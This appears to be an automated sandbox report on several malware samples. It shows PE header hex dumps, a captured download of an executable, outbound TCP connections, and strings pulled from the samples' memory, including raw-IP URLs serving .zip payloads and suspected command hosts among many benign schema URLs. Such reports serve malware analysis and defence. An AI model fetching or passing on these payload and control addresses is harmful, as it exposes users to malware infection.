00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:24:04 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00

Source: global traffic	TCP traffic: 192.168.2.3:49952 -> 103.89.90.61:34589
Source: global traffic	TCP traffic: 192.168.2.3:49994 -> 195.54.170.157:16525

Source: F0geI.exe, 0000000F.00000003.460069237.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, F0geI.exe, 0000000F.00000003.460637048.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, F0geI.exe, 0000000F.00000002.489560367.0000000003CE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.95.11.158/eb85c7cc57b6e232e54a26fabf41aff7U
Source: 9n6ctoq7cn.exe, me.exe, 0000001D.00000000.406600715.0000000000D23000.00000002.00000001.01000000.00000012.sdmp, me.exe, 0000001D.00000002.693545020.0000000000D23000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://62.204.41.126:80
Source: me.exe, 0000001D.00000000.406600715.0000000000D23000.00000002.00000001.01000000.00000012.sdmp, me.exe, 0000001D.00000002.693545020.0000000000D23000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://62.204.41.126:800NULL%s
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.103.222/
Source: real.exe, 00000017.00000002.465506612.0000000000B54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.103.222/1571
Source: real.exe, 00000017.00000002.465506612.0000000000B54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.103.222/1571B
Source: real.exe, 00000017.00000002.465506612.0000000000B54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.103.222/8938201687.zip
Source: real.exe, 00000017.00000002.465506612.0000000000B54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.91.103.222/8938201687.zipx
Source: real.exe, 00000017.00000002.460941633.000000000059D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://77.91.103.222:80/8938201687.zip
Source: real.exe, 00000017.00000002.460941633.000000000059D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://77.91.103.222:80/8938201687.ziph
Source: real.exe, 00000017.00000000.382727535.0000000000104000.00000002.00000001.01000000.0000000A.sdmp, real.exe, 00000017.00000002.460179149.0000000000104000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://77.91.103.226:80
Source: brokerius.exe, 0000001A.00000003.588632092.00000000011C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://88.198.122.116:80
Source: brokerius.exe, 0000001A.00000002.640825633.00000000010FD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://88.198.122.116:80/2551251222.zip
Source: brokerius.exe, 0000001A.00000002.640825633.00000000010FD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://88.198.122.116:80/2551251222.ziph
Source: SETUP_~1.EXE, 00000027.00000002.726536828.000000000292C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: real.exe, 00000017.00000002.465506612.0000000000B54000.00000004.00000020.00020000.00000000.sdmp, real.exe, 00000017.00000003.394481109.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000003.605892751.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000002.695059082.0000000000B93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SETUP_~1.EXE, 00000027.00000002.725301300.000000000290C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cutt.ly
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: SETUP_~1.EXE, 00000027.00000002.737338077.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: SETUP_~1.EXE, 00000027.00000002.737036164.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000002.737338077.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json(Unexpected
Source: SETUP_~1.EXE, 00000027.00000002.737036164.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000002.737338077.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json2IsSpecified
Source: SETUP_~1.EXE, 00000027.00000002.737036164.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000002.737338077.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/jsonlCould
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: namdoitntn.exe, 00000015.00000002.716900802.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: namdoitntn.exe, 00000015.00000002.716900802.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
Source: jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultL
Source: namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
